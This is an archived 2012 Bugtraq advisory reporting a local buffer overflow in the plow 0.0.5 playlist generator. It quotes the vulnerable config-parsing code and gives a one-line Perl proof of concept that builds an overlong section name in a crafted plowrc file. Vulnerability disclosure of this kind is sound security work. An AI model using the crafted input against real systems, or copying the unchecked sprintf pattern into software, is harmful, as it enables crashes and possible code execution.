| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 3 Jul 2012 12:11:39 GMT
From: pereira@...biz.de
To: bugtraq@...urityfocus.com
Subject: plow 0.0.5 <= Buffer Overflow Vulnerability
#################################################
plow 0.0.5 <= Buffer Overflow Vulnerability
#################################################
Discovered by: Jean Pascal Pereira <pereira@...biz.de>
Vendor information:
"plow is a command line playlist generator."
Vendor URI: http://developer.berlios.de/projects/plow/
#################################################
Risk-level: Medium
The application is prone to a local buffer overflow vulnerability.
-------------------------------------
IniParser.cpp, line 26:
26: char buffer[length];
27: char group [length];
28:
29: char *option;
30: char *value;
31:
32: while(ini.getline(buffer, length)) {
33: if(!strlen(buffer) || buffer[0] == '#') {
34: continue;
35: }
36: if(buffer[0] == '[') {
37: if(buffer[strlen(buffer) - 1] == ']') {
38: sprintf(group, "%s", buffer);
39: } else {
40: err = 1;
41: break;
42: }
43: }
-------------------------------------
Exploit / Proof Of Concept:
Create a crafted plowrc file:
perl -e '$x="A"x1096;print("[".$x."]\nA=B")'>plowrc
-------------------------------------
Solution:
Do some input validation.
-------------------------------------
#################################################
Powered by blists - more mailing lists